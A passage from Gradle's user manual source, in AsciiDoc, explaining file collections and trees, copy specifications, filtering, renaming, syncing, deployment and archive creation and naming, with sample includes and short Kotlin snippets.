created. As long as you use `union` after those files are added to `collection`, `union` will also contain those additional files. The same goes for the `different` file collection.\n\nLive collections are also important when it comes to _filtering_. If you want to use a subset of a file collection, you can take advantage of the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html#filter-org.gradle.api.specs.Spec-[FileCollection.filter(org.gradle.api.specs.Spec)] method to determine which files to \"keep\". In the following example, we create a new collection that consists of only the files that end with .txt in the source collection:\n\n.Filtering a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=filtering-file-collections]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=filtering-file-collections]\"]\n====\n\n.Output of **`gradle -q filterTextFiles`**\n----\n> gradle -q filterTextFiles\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsFiltering.out[]\n----\n\nIf `collection` changes at any time, either by adding or removing files from itself, then `textFiles` will immediately reflect the change because it is also a live collection. 
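\n\nIn the Kotlin DSL, such a filter might look roughly like this (the file names are made up):\n\n[source,kotlin]\n----\nval collection = layout.files(\"src\/file1.txt\", \"src\/file2.txt\", \"src\/image.png\")\n\n\/\/ filter() returns a live FileCollection containing only the matching files\nval textFiles = collection.filter { f: File ->\n    f.name.endsWith(\".txt\")\n}\n----\n\n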
Note that the closure you pass to `filter()` takes a `File` as an argument and should return a boolean.\n\n[[sec:file_trees]]\n=== File trees\n\nA _file tree_ is a file collection that retains the directory structure of the files it contains and has the type link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree]. This means that all the paths in a file tree must have a shared parent directory. The following diagram highlights the distinction between file trees and file collections in the common case of copying files:\n\n.The differences in how file trees and file collections behave when copying files\nimage::file-collection-vs-file-tree.png[]\n\nNOTE: Although `FileTree` extends `FileCollection` (an is-a relationship), their behaviors do differ. In other words, you can use a file tree wherever a file collection is required, but remember: a file collection is a flat list\/set of files, while a file tree is a file and directory hierarchy. To convert a file tree to a flat collection, use the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#getFiles--[FileTree.getFiles()] property.\n\nThe simplest way to create a file tree is to pass a file or directory path to the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:fileTree(java.lang.Object)[Project.fileTree(java.lang.Object)] method. This will create a tree of all the files and directories in that base directory (but not the base directory itself). The following example demonstrates how to use the basic method and, in addition, how to filter the files and directories using Ant-style patterns:\n\n.Creating a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=define]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=define]\"]\n====\n\nYou can see more examples of supported patterns in the API docs for link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. Also, see the API documentation for `fileTree()` to see what types you can pass as the base directory.\n\nBy default, `fileTree()` returns a `FileTree` instance that applies some default exclude patterns for convenience \u2014 the same defaults as Ant in fact. 
For the complete default exclude list, see http:\/\/ant.apache.org\/manual\/dirtasks.html#defaultexcludes[the Ant manual].\n\n[[sec:change_default_excludes]]\nIf those default excludes prove problematic, you can work around the issue by changing the default excludes in the settings script:\n\n.Changing default excludes in the settings script\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"settings.gradle[tags=change-default-exclusions]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"settings.gradle.kts[tags=change-default-exclusions]\"]\n====\n\n[NOTE]\n====\nCurrently, Gradle's default excludes are configured via Ant's `DirectoryScanner` class.\n====\n\n[NOTE]\n====\nGradle does not support changing default excludes during the execution phase.\n====\n\nYou can do many of the same things with file trees that you can with file collections:\n\n * iterate over them (depth first)\n * filter them (using link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#matching-org.gradle.api.Action-[FileTree.matching(org.gradle.api.Action)] and Ant-style patterns)\n * merge them\n\nYou can also traverse file trees using the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#visit-org.gradle.api.Action-[FileTree.visit(org.gradle.api.Action)] method. All of these techniques are demonstrated in the following example:\n\n.Using a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=use]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=use]\"]\n====\n\nWe've discussed how to create your own file trees and file collections, but it's also worth bearing in mind that many Gradle plugins provide their own instances of file trees, such as <<building_java_projects.adoc#sec:java_source_sets,Java's source sets>>. These can be used and manipulated in exactly the same way as the file trees you create yourself.\n\nAnother specific type of file tree that users commonly need is the archive, i.e. ZIP files, TAR files, etc. We look at those next.\n\n[[sec:archive_contents]]\n=== Using archives as file trees\n\nAn archive is a directory and file hierarchy packed into a single file. In other words, it's a special case of a file tree, and that's exactly how Gradle treats archives. Instead of using the `fileTree()` method, which only works on normal file systems, you use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)] methods to wrap archive files of the corresponding type (note that JAR, WAR and EAR files are ZIPs). Both methods return `FileTree` instances that you can then use in the same way as normal file trees. For example, you can extract some or all of the files of an archive by copying its contents to some directory on the file system. 
Or you can merge one archive into another.\n\nHere are some simple examples of creating archive-based file trees:\n\n.Using an archive as a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=archive-trees]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=archive-trees]\"]\n====\n\nYou can see a practical example of extracting an archive file <<#sec:unpacking_archives_example,in among the common scenarios>> we cover.\n\n[[sec:specifying_multiple_files]]\n=== Understanding implicit conversion to file collections\n\nMany objects in Gradle have properties which accept a set of input files.\nFor example, the link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile] task has a `source` property that defines the source files to compile.\nYou can set the value of this property using any of the types supported by the <<#sec:file_collections,files()>> method, as mentioned in the API docs.\nThis means you can, for example, set the property to a `File`, `String`, collection, `FileCollection` or even a closure or `Provider`.\n\n*This is a feature of specific tasks*!\nThat means implicit conversion will not happen for just any task that has a `FileCollection` or `FileTree` property.\nIf you want to know whether implicit conversion happens in a particular situation, you will need to read the relevant documentation, such as the corresponding task's API docs.\nAlternatively, you can remove all doubt by explicitly using link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] in your build.\n\nHere are some examples of the different types of arguments that the `source` property can take:\n\n.Specifying a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=set-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=set-input-files]\"]\n====\n\nOne other thing to note is that properties like `source` have corresponding methods in core Gradle tasks. Those methods follow the convention of _appending_ to collections of values rather than replacing them. Again, these methods accept any of the types supported by the <<#sec:file_collections,files()>> method, as shown here:\n\n.Appending a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=add-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=add-input-files]\"]\n====\n\nAs this is a common convention, we recommend that you follow it in your own custom tasks. 
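\n\nFor instance, here is a sketch of a hypothetical custom task that follows the appending convention (all names are invented for illustration):\n\n[source,kotlin]\n----\nabstract class ProcessDocs : DefaultTask() {\n    @get:InputFiles\n    abstract val sourceFiles: ConfigurableFileCollection\n\n    \/\/ Appends to the property rather than replacing its current value\n    fun sources(vararg paths: Any) {\n        sourceFiles.from(paths)\n    }\n\n    @TaskAction\n    fun process() {\n        sourceFiles.forEach { println(\"Processing $it\") }\n    }\n}\n\ntasks.register<ProcessDocs>(\"processDocs\") {\n    sources(\"src\/docs\", \"src\/samples\") \/\/ adds to, rather than overwrites, sourceFiles\n}\n----\n\n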
Specifically, if you plan to add a method to configure a collection-based property, make sure the method appends rather than replaces values.\n\n[[sec:copying_files]]\n== File copying in depth\n\nThe basic process of copying files in Gradle is a simple one:\n\n * Define a task of type link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy]\n * Specify which files (and potentially directories) to copy\n * Specify a destination for the copied files\n\nBut this apparent simplicity hides a rich API that allows fine-grained control of which files are copied, where they go, and what happens to them as they are copied \u2014 renaming of the files and token substitution of file content are both possibilities, for example.\n\nLet's start with the last two items on the list, which form what is known as a _copy specification_. This is formally based on the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html[CopySpec] interface, which the `Copy` task implements, and offers:\n\n * A link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#from-java.lang.Object++...++-[CopySpec.from(java.lang.Object...)] method to define what to copy\n * An link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#into-java.lang.Object-[CopySpec.into(java.lang.Object)] method to define the destination\n\n`CopySpec` has several additional methods that allow you to control the copying process, but these two are the only required ones. `into()` is straightforward, requiring a directory path as its argument in any form supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method. The `from()` configuration is far more flexible.\n\nNot only does `from()` accept multiple arguments, it also allows several different types of argument. For example, some of the most common types are:\n\n * A `String` \u2014 treated as a file path or, if it starts with \"file:\/\/\", a file URI\n * A `File` \u2014 used as a file path\n * A `FileCollection` or `FileTree` \u2014 all files in the collection are included in the copy\n * A task \u2014\u00a0the files or directories that form a task's <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>> are included\n\nIn fact, `from()` accepts all the same arguments as link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] so see that method for a more detailed list of acceptable types.\n\nSomething else to consider is what type of thing a file path refers to:\n\n * A file \u2014 the file is copied as is\n * A directory \u2014 this is effectively treated as a file tree: everything in it, including subdirectories, is copied. However, the directory itself is not included in the copy.\n * A non-existent file \u2014 the path is ignored\n\nHere is an example that uses multiple `from()` specifications, each with a different argument type. 
You will probably also notice that `into()` is configured lazily using a closure (in Groovy) or a Provider (in Kotlin) \u2014 a technique that also works with `from()`:\n\n.Specifying copy task source files and destination directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-2]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-2]\"]\n====\n\nNote that the lazy configuration of `into()` is different from a <<#sub:using_child_copy_specifications,child specification>>, even though the syntax is similar. Keep an eye on the number of arguments to distinguish between them.\n\n[[filtering_files]]\n=== Filtering files\n\nYou've already seen that you can filter file collections and file trees directly in a `Copy` task, but you can also apply filtering in any copy specification through the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#include-java.lang.String++...++-[CopySpec.include(java.lang.String...)] and link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#exclude-java.lang.String++...++-[CopySpec.exclude(java.lang.String...)] methods.\n\nBoth of these methods are normally used with Ant-style include or exclude patterns, as described in link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. You can also perform more complex logic by using a closure that takes a link:{javadocPath}\/org\/gradle\/api\/file\/FileTreeElement.html[FileTreeElement] and returns `true` if the file should be included or `false` otherwise. The following example demonstrates both forms, ensuring that only .html and .jsp files are copied, except for those .html files with the word \"DRAFT\" in their content:\n\n.Selecting the files to copy\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-with-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-with-patterns]\"]\n====\n\nA question you may ask yourself at this point is: what happens when inclusion and exclusion patterns overlap? Which pattern wins? Here are the basic rules:\n\n * If there are no explicit inclusions or exclusions, everything is included\n * If at least one inclusion is specified, only files and directories matching the patterns are included\n * Any exclusion pattern overrides any inclusions, so if a file or directory matches at least one exclusion pattern, it won't be included, regardless of the inclusion patterns\n\nBear these rules in mind when creating combined inclusion and exclusion specifications so that you end up with the exact behavior you want.\n\nNote that the inclusions and exclusions in the above example will apply to _all_ `from()` configurations. If you want to apply filtering to a subset of the copied files, you'll need to use <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:renaming_files]]\n=== Renaming files\n\nThe <<#sec:renaming_files_example,example of how to rename files on copy>> gives you most of the information you need to perform this operation. It demonstrates the two options for renaming:\n\n * Using a regular expression\n * Using a closure\n\nRegular expressions are a flexible approach to renaming, particularly as Gradle supports regex groups that allow you to remove and replace parts of the source filename. 
The following example shows how you can remove the string \"-staging-\" from any filename that contains it using a simple regular expression:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-files]\"]\n====\n\nYou can use any regular expression supported by the Java `{javaApi}\/java\/util\/regex\/Pattern.html[Pattern]` class and the substitution string (the second argument of `rename()`) works on the same principles as the `{javaApi}\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[Matcher.appendReplacement()]` method.\n\n.Regular expressions in Groovy build scripts\n[NOTE]\n====\nThere are two common issues people come across when using regular expressions in this context:\n\n 1. If you use a slashy string (those delimited by '\/') for the first argument, you _must_ include the parentheses for `rename()` as shown in the above example.\n 2. It's safest to use single quotes for the second argument, otherwise you need to escape the '$' in group substitutions, i.e. `\"\\$1\\$2\"`\n\nThe first is a minor inconvenience, but slashy strings have the advantage that you don't have to escape backslash ('\\') characters in the regular expression. The second issue stems from Groovy's support for embedded expressions using `${ }` syntax in double-quoted and slashy strings.\n====\n\nThe closure syntax for `rename()` is straightforward and can be used for any requirements that simple regular expressions can't handle. You're given the name of a file and you return a new name for that file, or `null` if you don't want to change the name. Do be aware that the closure will be executed for every file that's copied, so try to avoid expensive operations where possible.\n\n[[sec:filtering_files]]\n=== Filtering file content (token substitution, templating, etc.)\n\nNot to be confused with filtering which files are copied, _file content filtering_ allows you to transform the content of files while they are being copied. This can involve basic templating that uses token substitution, removal of lines of text, or even more complex filtering using a full-blown template engine.\n\nThe following example demonstrates several forms of filtering, including token substitution using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#expand-java.util.Map-[CopySpec.expand(java.util.Map)] method and another using link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#filter-java.lang.Class-[CopySpec.filter(java.lang.Class)] with an https:\/\/ant.apache.org\/manual\/Types\/filterchain.html[Ant filter]:\n\n.Filtering files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=filter-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=filter-files]\"]\n====\n\nThe `filter()` method has two variants, which behave differently:\n\n * one takes a `{javaApi}\/java\/io\/FilterReader.html[FilterReader]` and is designed to work with Ant filters, such as `ReplaceTokens`\n * one takes a closure or link:{javadocPath}\/org\/gradle\/api\/Transformer.html[Transformer] that defines the transformation for each line of the source file\n\nNote that both variants assume the source files are text based. 
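\n\nAs a rough illustration of the second variant in the Kotlin DSL (the paths and the replaced token are invented):\n\n[source,kotlin]\n----\ntasks.register<Copy>(\"filterReadme\") {\n    from(\"src\/docs\")\n    into(\"$buildDir\/filteredDocs\")\n    \/\/ The transformation is applied to every line of every copied file\n    filter { line: String ->\n        line.replace(\"[YEAR]\", \"2020\")\n    }\n}\n----\n\n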
When you use the `ReplaceTokens` class with `filter()`, the result is a template engine that replaces tokens of the form `@tokenName@` (the Ant-style token) with values that you define.\n\nThe `expand()` method treats the source files as https:\/\/docs.groovy-lang.org\/latest\/html\/api\/groovy\/text\/SimpleTemplateEngine.html[Groovy templates], which evaluate and expand expressions of the form `${expression}`. You can pass in property names and values that are then expanded in the source files. `expand()` allows for more than basic token substitution as the embedded expressions are full-blown Groovy expressions.\n\nNOTE: It's good practice to specify the character set when reading and writing the file, otherwise the transformations won't work properly for non-ASCII text. You configure the character set with the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#getFilteringCharset--[CopySpec.getFilteringCharset()] property. If it's not specified, the JVM default character set is used, which is likely to be different from the one you want.\n\n[[sec:using_the_copyspec_class]]\n=== Using the `CopySpec` class\n\nA copy specification (or copy spec for short) determines what gets copied to where, and what happens to files during the copy. You've already seen many examples in the form of configuration for `Copy` and archiving tasks. But copy specs have two attributes that are worth covering in more detail:\n\n 1. They can be independent of tasks\n 2. They are hierarchical\n\nThe first of these attributes allows you to _share copy specs within a build_. The second provides fine-grained control within the overall copy specification.\n\n[[sub:sharing_copy_specs]]\n==== Sharing copy specs\n\nConsider a build that has several tasks that copy a project's static website resources or add them to an archive. One task might copy the resources to a folder for a local HTTP server and another might package them into a distribution. You could manually specify the file locations and appropriate inclusions each time they are needed, but human error is more likely to creep in, resulting in inconsistencies between tasks.\n\nOne solution Gradle provides is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method. This allows you to create a copy spec outside of a task, which can then be attached to an appropriate task using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#with-org.gradle.api.file.CopySpec++...++-[CopySpec.with(org.gradle.api.file.CopySpec...)] method. The following example demonstrates how this is done:\n\n.Sharing copy specifications\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=standalone-copyspec]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=standalone-copyspec]\"]\n====\n\nBoth the `copyAssets` and `distApp` tasks will process the static resources under `src\/main\/webapp`, as specified by `webAssetsSpec`.\n\n[NOTE]\n====\nThe configuration defined by `webAssetsSpec` will _not_ apply to the app classes included by the `distApp` task. That's because `from appClasses` is its own child specification independent of `with webAssetsSpec`.\n\nThis can be confusing to understand, so it's probably best to treat `with()` as an extra `from()` specification in the task. 
Hence it doesn't make sense to define a standalone copy spec without at least one `from()` defined.\n====\n\nIf you encounter a scenario in which you want to apply the same copy configuration to _different_ sets of files, then you can share the configuration block directly without using `copySpec()`. Here's an example that has two independent tasks that happen to want to process image files only:\n\n.Sharing copy patterns only\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=shared-copy-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=shared-copy-patterns]\"]\n====\n\nIn this case, we assign the copy configuration to its own variable and apply it to whatever `from()` specification we want. This doesn't just work for inclusions, but also exclusions, file renaming, and file content filtering.\n\n[[sub:using_child_copy_specifications]]\n==== Using child specifications\n\nIf you only use a single copy spec, the file filtering and renaming will apply to _all_ the files that are copied. Sometimes this is what you want, but not always. Consider the following example that copies files into a directory structure that can be used by a Java Servlet container to deliver a website:\n\n.Creating an exploded WAR for a Servlet container\nimage::exploded-war-child-copy-spec-example.png[]\n\nThis is not a straightforward copy as the `WEB-INF` directory and its subdirectories don't exist within the project, so they must be created during the copy. In addition, we only want HTML and image files going directly into the root folder \u2014 `build\/explodedWar` \u2014 and only JavaScript files going into the `js` directory. So we need separate filter patterns for those two sets of files.\n\nThe solution is to use _child specifications_, which can be applied to both `from()` and `into()` declarations. The following task definition does the necessary work:\n\n.Nested copy specs\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=nested-specs]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=nested-specs]\"]\n====\n\nNotice how the `src\/dist` configuration has a nested inclusion specification: that's the child copy spec. You can of course add content filtering and renaming here as required. A child copy spec is still a copy spec.\n\nThe above example also demonstrates how you can copy files into a subdirectory of the destination either by using a child `into()` on a `from()` or a child `from()` on an `into()`. Both approaches are acceptable, but you may want to create and follow a convention to ensure consistency across your build files.\n\n[NOTE]\nDon't get your `into()` specifications mixed up! For a normal copy \u2014\u00a0one to the filesystem rather than an archive \u2014 there should always be _one_ \"root\" `into()` that simply specifies the overall destination directory of the copy. Any other `into()` should have a child spec attached and its path will be relative to the root `into()`.\n\nOne final thing to be aware of is that a child copy spec inherits its destination path, include patterns, exclude patterns, copy actions, name mappings and filters from its parent. So be careful where you place your configuration.\n\n[[sec:project_copy_method]]\n=== Copying files in your own tasks\n\nThere might be occasions when you want to copy files or directories as _part_ of a task. 
For example, a custom archiving task based on an unsupported archive format might want to copy files to a temporary directory before they are archived. You still want to take advantage of Gradle's copy API, but without introducing an extra `Copy` task.\n\nThe solution is to use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copy(org.gradle.api.Action)[Project.copy(org.gradle.api.Action)] method. It works the same way as the `Copy` task by configuring it with a copy spec. Here's a trivial example:\n\n.Copying files using the copy() method without up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method]\"]\n====\n\nThe above example demonstrates the basic syntax and also highlights two major limitations of using the `copy()` method:\n\n 1. The `copy()` method is not <<more_about_tasks.adoc#sec:up_to_date_checks,incremental>>. The example's `copyMethod` task will _always_ execute because it has no information about what files make up the task's inputs. You have to manually define the task inputs and outputs.\n\n 2. Using a task as a copy source, i.e. as an argument to `from()`, won't set up an automatic task dependency between your task and that copy source. As such, if you are using the `copy()` method as part of a task action, you must explicitly declare all inputs and outputs in order to get the correct behavior.\n\nThe following example shows you how to work around these limitations by using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,dynamic API for task inputs and outputs>>:\n\n.Copying files using the copy() method with up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method-with-dependency]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method-with-dependency]\"]\n====\n\nThese limitations make it preferable to use the `Copy` task wherever possible, because of its builtin support for incremental building and task dependency inference. That is why the `copy()` method is intended for use by <<custom_tasks.adoc#custom_tasks,custom tasks>> that need to copy files as part of their function. Custom tasks that use the `copy()` method should declare the necessary inputs and outputs relevant to the copy action.\n\n[[sec:sync_task]]\n=== Mirroring directories and file collections with the `Sync` task\n\nThe link:{groovyDslPath}\/org.gradle.api.tasks.Sync.html[Sync] task, which extends the `Copy` task, copies the source files into the destination directory and then removes any files from the destination directory which it did not copy. In other words, it synchronizes the contents of a directory with its source. 
This can be useful for doing things such as installing your application, creating an exploded copy of your archives, or maintaining a copy of the project's dependencies.\n\nHere is an example which maintains a copy of the project's runtime dependencies in the `build\/libs` directory.\n\n.Using the Sync task to copy dependencies\n====\ninclude::sample[dir=\"snippets\/files\/sync\/groovy\",files=\"build.gradle[tags=copy-dependencies]\"]\ninclude::sample[dir=\"snippets\/files\/sync\/kotlin\",files=\"build.gradle.kts[tags=copy-dependencies]\"]\n====\n\nYou can also perform the same function in your own tasks with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:sync(org.gradle.api.Action)[Project.sync(org.gradle.api.Action)] method.\n\n[[sec:copy_deploy]]\n=== Deploying single files into application servers\n\nWhen working with application servers, you can use a `Copy` task to deploy the application archive (e.g. a WAR file).\nSince you are deploying a single file, the destination directory of the `Copy` is the whole deployment directory.\nThe deployment directory sometimes does contain unreadable files like named pipes, so Gradle may have problems doing up-to-date checks.\nIn order to support this use-case, you can use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to deploy a WAR file\n====\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:install_executable]]\n=== Installing executables\n\nWhen you are building a standalone executable, you may want to install this file on your system, so it ends up in your path.\nYou can use a `Copy` task to install the executable into shared directories like `\/usr\/local\/bin`.\nThe installation directory probably contains many other executables, some of which may even be unreadable by Gradle.\nTo support the unreadable files in the `Copy` task's destination directory and to avoid time-consuming up-to-date checks, you can use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to install an executable\n====\ninclude::sample[dir=\"snippets\/files\/installExecutable\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/installExecutable\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:archives]]\n== Archive creation in depth\n\nArchives are essentially self-contained file systems and Gradle treats them as such. This is why working with archives is very similar to working with files and directories, including such things as file permissions.\n\nOut of the box, Gradle supports creation of both ZIP and TAR archives, and by extension Java's JAR, WAR and EAR formats \u2014\u00a0Java's archive formats are all ZIPs. Each of these formats has a corresponding task type to create them: link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.War.html[War], and link:{groovyDslPath}\/org.gradle.plugins.ear.Ear.html[Ear]. 
These all work the same way and are based on copy specifications, just like the `Copy` task.\n\nCreating an archive file is essentially a file copy in which the destination is implicit, i.e. the archive file itself. Here's a basic example that specifies the path and name of the target archive file:\n\n.Archiving a directory as a ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nIn the next section you'll learn about convention-based archive names, which can save you from always configuring the destination directory and archive name.\n\nThe full power of copy specifications is available to you when creating archives, which means you can do content filtering, file renaming or anything else that is covered in the previous section. A particularly common requirement is copying files into subdirectories of the archive that don't exist in the source folders, something that can be achieved with `into()` <<#sub:using_child_copy_specifications,child specifications>>.\n\nGradle does of course allow you to create as many archive tasks as you want, but it's worth bearing in mind that many convention-based plugins provide their own. For example, the Java plugin adds a `jar` task for packaging a project's compiled classes and resources in a JAR. Many of these plugins provide sensible conventions for the names of archives as well as the copy specifications used. We recommend you use these tasks wherever you can, rather than overriding them with your own.\n\n[[sec:archive_naming]]\n=== Archive naming\n\nGradle has several conventions around the naming of archives and where they are created based on the plugins your project uses. 
The main convention is provided by the <<base_plugin.adoc#base_plugin,Base Plugin>>, which defaults to creating archives in the `$buildDir\/distributions` directory and typically uses archive names of the form _[projectName]-[version].[type]_.\n\nThe following example comes from a project named `archive-naming`, hence the `myZip` task creates an archive named `archive-naming-1.0.zip`:\n\n.Creation of ZIP archive\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task]\"]\n====\n\n.Output of **`gradle -q myZip`**\n----\n> gradle -q myZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/archiveNaming.out[]\n----\n\nNote that the name of the archive does _not_ derive from the name of the task that creates it.\n\nIf you want to change the name and location of a generated archive file, you can provide values for the `archiveFileName` and `destinationDirectory` properties of the corresponding task.\nThese override any conventions that would otherwise apply.\n\nAlternatively, you can make use of the default archive name pattern provided by link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html#org.gradle.api.tasks.bundling.AbstractArchiveTask:archiveFileName[AbstractArchiveTask.getArchiveFileName()]: _[archiveBaseName]-[archiveAppendix]-[archiveVersion]-[archiveClassifier].[archiveExtension]_.\nYou can set each of these properties on the task separately if you wish.\nNote that the Base Plugin uses the convention of project name for _archiveBaseName_, project version for _archiveVersion_ and the archive type for _archiveExtension_.\nIt does not provide values for the other properties.\n\nThis example \u2014 from the same project as the one above \u2014 configures just the `archiveBaseName` property, overriding the default value of the project name:\n\n.Configuration of archive task - custom archive name\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task-with-custom-base-name]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task-with-custom-base-name]\"]\n====\n\n.Output of **`gradle -q myCustomZip`**\n----\n> gradle -q myCustomZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/zipWithCustomName.out[]\n----\n\nYou can also override the default `archiveBaseName` value for _all_ the archive tasks in your build by using the _project_ property `archivesBaseName`, as demonstrated by the following example:\n\n.Configuration of archive task - appendix & classifier\n====\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/groovy\",files=\"build.gradle[]\"]\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/kotlin\",files=\"build.gradle.kts[]\"]\n====\n\n.Output of **`gradle -q echoNames`**\n----\n> gradle -q echoNames\ninclude::{snippetsPath}\/files\/archivesChangedBaseName\/tests\/zipWithArchivesBaseName.out[]\n----\n\nYou can find all the possible archive task properties in the API documentation for 